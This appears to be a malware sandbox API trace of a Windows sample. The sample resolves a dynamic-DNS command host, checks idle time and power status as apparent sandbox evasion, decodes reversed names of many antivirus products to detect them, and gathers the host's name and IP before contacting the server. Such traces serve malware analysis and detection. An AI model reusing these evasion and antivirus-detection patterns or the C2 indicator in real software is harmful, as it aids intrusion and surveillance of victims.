[0410.292] FindFirstFileW (in: lpFileName="c:\\act\\13.dat" (normalized: "c:\\act\\13.dat"), lpFindFileData=0x24cf450 | out: lpFindFileData=0x24cf450*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x4a0048, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x23f5f0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x236e00, dwReserved0=0x0, dwReserved1=0x25, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
[0410.294] WSAStartup (in: wVersionRequired=0x101, lpWSAData=0x24cf500 | out: lpWSAData=0x24cf500) returned 0
[0410.311] gethostbyname (name="asper1.freeddns.org") returned 0x1e06f60*(h_name="asper1.freeddns.org", h_aliases=0x1e06f80*=0x0, h_addrtype=2, h_length=4, h_addr_list=0x1e06f88*=([0]="186.48.86.162"))
[0415.298] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="186", cbMultiByte=3, lpWideCharStr=0x24ce210, cchWideChar=2047 | out: lpWideCharStr="186") returned 3
[0415.298] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="486", cbMultiByte=2, lpWideCharStr=0x24ce210, cchWideChar=2047 | out: lpWideCharStr="486") returned 2
[0415.299] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="866", cbMultiByte=2, lpWideCharStr=0x24ce210, cchWideChar=2047 | out: lpWideCharStr="866") returned 2
[0415.299] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="162", cbMultiByte=3, lpWideCharStr=0x24ce210, cchWideChar=2047 | out: lpWideCharStr="162") returned 3
[0415.299] WSACleanup () returned 0
[0415.543] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="186.48.86.162", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13
[0415.543] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="186.48.86.162", cchWideChar=13, lpMultiByteStr=0x1f8c280, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="186.48.86.162", lpUsedDefaultChar=0x0) returned 13
[0415.543] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="1136.dat", cbMultiByte=8, lpWideCharStr=0x24ce380, cchWideChar=2047 | out: lpWideCharStr="1136.dat\x02") returned 8
[0415.543] FindFirstFileW (in: lpFileName="1136.dat" (normalized: "c:\\windows\\system32\\1136.dat"), lpFindFileData=0x24cf410 | out: lpFindFileData=0x24cf410*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x1df5590, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0xfaca0000, ftLastWriteTime.dwLowDateTime=0x7fe, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x24cf4d8, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
[0415.544] LoadLibraryW (lpLibFileName="user32.dll") returned 0x77780000
[0415.544] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetLastInputInfo", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16
[0415.544] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetLastInputInfo", cchWideChar=16, lpMultiByteStr=0x1f8c2b0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetLastInputInfo", lpUsedDefaultChar=0x0) returned 16
[0415.544] GetProcAddress (hModule=0x77780000, lpProcName="GetLastInputInfo") returned 0x777962f4
[0415.545] GetLastInputInfo (in: plii=0x24cf03c | out: plii=0x24cf03c*(cbSize=0x8, dwTime=0x142a26c)) returned 1
[0415.545] GetTickCount () returned 0x14617d7
[0415.545] FreeLibrary (hLibModule=0x77780000) returned 1
[0415.545] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="0\x80w", cbMultiByte=1, lpWideCharStr=0x24cddc0, cchWideChar=2047 | out: lpWideCharStr="0ʂ") returned 1
[0415.548] GetSystemPowerStatus (in: lpSystemPowerStatus=0x24cf044 | out: lpSystemPowerStatus=0x24cf044) returned 1
[0415.548] QueryPerformanceCounter (in: lpPerformanceCount=0x24cf048 | out: lpPerformanceCount=0x24cf048*=2149999519783) returned 1
[0415.548] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="00", cbMultiByte=2, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="00") returned 2
[0415.548] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="XX", cbMultiByte=2, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="XX") returned 2
[0415.548] GetTempPathW (in: nBufferLength=0x105, lpBuffer=0x24ce816 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\") returned 0x25
[0415.549] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\~dr9078", cchWideChar=44, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 44
[0415.549] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\~dr9078", cchWideChar=44, lpMultiByteStr=0x1f7db70, cbMultiByte=44, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\~dr9078", lpUsedDefaultChar=0x0) returned 44
[0415.554] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\~dr9078", cbMultiByte=44, lpWideCharStr=0x24cd730, cchWideChar=2047 | out: lpWideCharStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\~dr9078") returned 44
[0415.554] FindFirstFileW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\~dr9078" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\~dr9078"), lpFindFileData=0x24ce7c0 | out: lpFindFileData=0x24ce7c0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x62dcea0, ftCreationTime.dwHighDateTime=0x1dab599, ftLastAccessTime.dwLowDateTime=0x62dcea0, ftLastAccessTime.dwHighDateTime=0x1dab599, ftLastWriteTime.dwLowDateTime=0xa8c94e0, ftLastWriteTime.dwHighDateTime=0x1dab599, nFileSizeHigh=0x0, nFileSizeLow=0x41, dwReserved0=0x0, dwReserved1=0x24ce808, cFileName="~dr9078", cAlternateFileName="")) returned 0x245f30
[0415.555] FindClose (in: hFindFile=0x245f30 | out: hFindFile=0x245f30) returned 1
[0415.555] Sleep (dwMilliseconds=0x3e8)
[0415.567] GetTempPathW (in: nBufferLength=0x105, lpBuffer=0x24ce816 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\") returned 0x25
[0415.567] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\~dr9078" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\~dr9078"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff
[0415.567] GetLastError () returned 0x20
[0415.567] LocalAlloc (uFlags=0x40, uBytes=0x214) returned 0x245a70
[0415.568] SleepEx (dwMilliseconds=0x64, bAlertable=1) returned 0x0
[0415.627] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="yksrepsak", cbMultiByte=9, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="yksrepsak%\x7f") returned 9
[0415.627] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="exe.nrkek", cbMultiByte=8, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="exe.nrkek%\x7f") returned 8
[0415.627] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="retsohsfk", cbMultiByte=8, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="retsohsfk%\x7f") returned 8
[0415.627] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="namyshsfk", cbMultiByte=5, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="namyshsfk%\x7f") returned 5
[0415.627] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="notronsfk", cbMultiByte=6, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="notronsfk%\x7f") returned 6
[0415.627] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="tsavansfk", cbMultiByte=5, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="tsavansfk%\x7f") returned 5
[0415.628] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="arivansfk", cbMultiByte=5, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="arivansfk%\x7f") returned 5
[0415.628] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="exe.draugva", cbMultiByte=11, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="exe.draugva") returned 11
[0415.628] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=" rivitnagva", cbMultiByte=8, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr=" rivitnagva") returned 8
[0415.628] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="exe.cvsgvaa", cbMultiByte=10, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="exe.cvsgvaa") returned 10
[0415.628] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="iugvavsgvaa", cbMultiByte=5, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="iugvavsgvaa") returned 5
[0415.628] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="eefacmsgvaa", cbMultiByte=6, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="eefacmsgvaa") returned 6
[0415.628] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="exe.yartpva", cbMultiByte=10, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="exe.yartpva") returned 10
[0415.628] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="dnertartpva", cbMultiByte=5, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="dnertartpva") returned 5
[0415.629] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="setaicossa krowten", cbMultiByte=18, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="setaicossa krowten") returned 18
[0415.629] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="exe.pvassa krowten", cbMultiByte=7, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="exe.pvassa krowten") returned 7
[0415.629] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="adnapvassa krowten", cbMultiByte=5, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="adnapvassa krowten") returned 5
[0415.629] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="exe.xsrgva krowten", cbMultiByte=10, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="exe.xsrgva krowten") returned 10
[0415.629] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="cvsdwgvava krowten", cbMultiByte=8, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="cvsdwgvava krowten") returned 8
[0415.629] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="exe.iugeva krowten", cbMultiByte=8, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="exe.iugeva krowten") returned 8
[0415.629] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="exe.yartmabsrowten", cbMultiByte=12, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="exe.yartmabsrowten") returned 12
[0415.629] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="exe.ssniwabsrowten", cbMultiByte=9, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="exe.ssniwabsrowten") returned 9
[0415.629] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="exe.ssdbwabsrowten", cbMultiByte=8, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="exe.ssdbwabsrowten") returned 8
[0415.629] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="exe.tnegadbsrowten", cbMultiByte=11, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="exe.tnegadbsrowten") returned 11
[0415.629] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="exe.walccdbsrowten", cbMultiByte=9, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="exe.walccdbsrowten") returned 9
[0415.629] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="exe.nomladbsrowten", cbMultiByte=9, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="exe.nomladbsrowten") returned 9
[0415.629] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="sohposmladbsrowten", cbMultiByte=6, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="sohposmladbsrowten") returned 6
[0415.629] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="exe.23mssfbsrowten", cbMultiByte=10, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="exe.23mssfbsrowten") returned 10
[0415.630] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="exe.nomtnccprowten", cbMultiByte=12, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="exe.nomtnccprowten") returned 12
[0415.630] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="atad gmtnccprowten", cbMultiByte=6, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="atad gmtnccprowten") returned 6
[0415.630] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="exe.iuredipsrowten", cbMultiByte=12, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="exe.iuredipsrowten") returned 12
[0415.630] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="exe.nom_popsrowten", cbMultiByte=10, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="exe.nom_popsrowten") returned 10
[0415.630] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="bewrdom_popsrowten", cbMultiByte=5, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="bewrdom_popsrowten") returned 5
[0415.630] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="eruces-fpopsrowten", cbMultiByte=8, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="eruces-fpopsrowten") returned 8
[0415.630] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="hkciuq-fpopsrowten", cbMultiByte=6, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="hkciuq-fpopsrowten") returned 6
[0415.630] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="sloot cppopsrowten", cbMultiByte=8, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="sloot cppopsrowten") returned 8
[0415.630] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="exe.yartstcprowten", cbMultiByte=12, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="exe.yartstcprowten") returned 12
[0415.630] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="erpivartstcprowten", cbMultiByte=5, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="erpivartstcprowten") returned 5
[0415.630] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="namronrtstcprowten", cbMultiByte=6, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="namronrtstcprowten") returned 6
[0415.630] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="exe.adnaztcprowten", cbMultiByte=9, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="exe.adnaztcprowten") returned 9
[0415.630] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="suriv-itna acowten", cbMultiByte=13, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="suriv-itna acowten") returned 13
[0415.630] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="exe.vsbewhsacowten", cbMultiByte=12, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="exe.vsbewhsacowten") returned 12
[0415.630] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="exe.yartsrsacowten", cbMultiByte=10, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="exe.yartsrsacowten") returned 10
[0415.631] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="exe.draug2aacowten", cbMultiByte=11, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="exe.draug2aacowten") returned 11
[0415.631] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="secessmug2aacowten", cbMultiByte=7, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="secessmug2aacowten") returned 7
[0415.631] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="draugllub2aacowten", cbMultiByte=9, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="draugllub2aacowten") returned 9
[0415.631] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="tneganlkb2aacowten", cbMultiByte=8, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="tneganlkb2aacowten") returned 8
[0415.631] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="vakbanlkb2aacowten", cbMultiByte=4, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="vakbanlkb2aacowten") returned 4
[0415.631] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="tshcvsccb2aacowten", cbMultiByte=8, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="tshcvsccb2aacowten") returned 8
[0415.631] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="odomocccb2aacowten", cbMultiByte=6, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="odomocccb2aacowten") returned 6
[0415.631] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="tnegadmcb2aacowten", cbMultiByte=8, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="tnegadmcb2aacowten") returned 8
[0415.631] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="exe.yart063acowten", cbMultiByte=11, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="exe.yart063acowten") returned 11
[0415.631] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="tngaesiu063acowten", cbMultiByte=8, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="tngaesiu063acowten") returned 8
[0415.631] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="malcesiu063acowten", cbMultiByte=4, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="malcesiu063acowten") returned 4
[0415.631] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="tnegaredipsacowten", cbMultiByte=11, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="tnegaredipsacowten") returned 11
[0415.631] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="ecivresmabmacowten", cbMultiByte=11, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="ecivresmabmacowten") returned 11
[0415.631] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="exe.cvspavancowten", cbMultiByte=12, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="exe.cvspavancowten") returned 12
[0415.631] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="exe.mocvavancowten", cbMultiByte=9, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="exe.mocvavancowten") returned 9
[0415.632] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="exe.yartazancowten", cbMultiByte=10, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="exe.yartazancowten") returned 10
[0415.632] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="tenummitazancowten", cbMultiByte=7, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="tenummitazancowten") returned 7
[0415.632] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="exe.iugvazancowten", cbMultiByte=9, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="exe.iugvazancowten") returned 9
[0415.632] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="yartmabmazancowten", cbMultiByte=8, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="yartmabmazancowten") returned 8
[0415.632] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="vrsmbmtmazancowten", cbMultiByte=7, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="vrsmbmtmazancowten") returned 7
[0415.632] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="tirivmtmazancowten", cbMultiByte=5, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="tirivmtmazancowten") returned 5
[0415.632] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="exe.esnefedevitcahq", cbMultiByte=19, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="exe.esnefedevitcahq") returned 19
[0415.632] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="exe.cvsdpudsvitcahq", cbMultiByte=12, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="exe.cvsdpudsvitcahq") returned 12
[0415.632] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="tnegacmdpudsvitcahq", cbMultiByte=7, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="tnegacmdpudsvitcahq") returned 7
[0415.632] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="vrsdpuyapudsvitcahq", cbMultiByte=8, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="vrsdpuyapudsvitcahq") returned 8
[0415.632] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="tnciucmapudsvitcahq", cbMultiByte=7, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="tnciucmapudsvitcahq") returned 7
[0415.632] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="yartexkapudsvitcahq", cbMultiByte=7, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="yartexkapudsvitcahq") returned 7
[0415.632] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="erocsexkpudsvitcahq", cbMultiByte=8, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="erocsexkpudsvitcahq") returned 8
[0415.632] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="cvsvaefmpudsvitcahq", cbMultiByte=8, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="cvsvaefmpudsvitcahq") returned 8
[0415.633] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="nacstr7kpudsvitcahq", cbMultiByte=8, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="nacstr7kpudsvitcahq") returned 8
[0415.633] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="exe.gnepmsmsvitcahq", cbMultiByte=11, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="exe.gnepmsmsvitcahq") returned 11
[0415.633] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="tfosavalmsmsvitcahq", cbMultiByte=8, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="tfosavalmsmsvitcahq") returned 8
[0415.633] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="exe.dleihscmvitcahq", cbMultiByte=12, lpWideCharStr=0x24cd8c0, cchWideChar=2047 | out: lpWideCharStr="exe.dleihscmvitcahq") returned 12
[0415.633] GetTempPathW (in: nBufferLength=0x105, lpBuffer=0x24ce816 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\") returned 0x25
[0415.633] DeleteFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\~dr9078" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\~dr9078")) returned 0
[0415.633] WSAStartup (in: wVersionRequired=0x101, lpWSAData=0x24ceeb8 | out: lpWSAData=0x24ceeb8) returned 0
[0415.732] gethostname (in: name=0x24cedac, namelen=256 | out: name="Q9iATrkPrH") returned 0
[0415.762] gethostbyname (name="Q9iATrkPrH") returned 0x1e06f60*(h_name="Q9iATrkPrH", h_aliases=0x1e06f80*=0x0, h_addrtype=2, h_length=4, h_addr_list=0x1e06f88*=([0]="192.168.0.174"))
[0415.851] inet_ntoa (in=0xae00a8c0) returned="192.168.0.174"
[0415.851] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="192.168.0.174", cbMultiByte=13, lpWideCharStr=0x24cdce0, cchWideChar=2047 | out: lpWideCharStr="192.168.0.174%") returned 13
[0415.851] WSACleanup () returned 0
[0416.053] WSAStartup (in: wVersionRequired=0x101, lpWSAData=0x24cf518 | out: lpWSAData=0x24cf518) returned 0
[0416.064] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="186.48.86.162", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13
[0416.064] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="186.48.86.162", cchWideChar=13, lpMultiByteStr=0x1f8c2b0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="186.48.86.162", lpUsedDefaultChar=0x0) returned 13
